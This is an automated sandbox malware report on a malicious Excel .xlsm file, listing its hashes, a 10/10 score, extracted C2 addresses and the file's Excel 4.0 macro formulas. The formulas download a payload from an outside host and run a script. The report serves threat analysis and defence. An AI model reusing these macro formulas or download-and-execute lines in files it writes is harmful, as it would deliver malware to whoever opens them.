Overview

overview

10

Static

static

10

1583f1e28a...2.xlsm

windows7-x64

10

1583f1e28a...2.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    1583f1e28a79fa7fdd7c4da0ed95d7d2

  • Size

    6KB

  • MD5

    1583f1e28a79fa7fdd7c4da0ed95d7d2

  • SHA1

    c56da6eeafbb55288d2dd1e16a63adde2287b69c

  • SHA256

    cd85fcbef4ad9fb6c1225ebcd3e219ac297b778e554b3678859766a9bcfa0311

  • SHA512

    cc0c5b46555ea8a16d5d0e89c7d6d3623972289425b7734ed2f29374b96735937438a34ca0dfcdf36054bfc0c65d47e421d57e7e02a11c9df452fb4ecbe26eb7

  • SSDEEP

    192:NDSFuSHbrA2OmmfRG8UhHFBFYuAb98yGX+V:NCuEM2ws1FY9b98yGe

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • 1583f1e28a79fa7fdd7c4da0ed95d7d2
    .xlsm office2007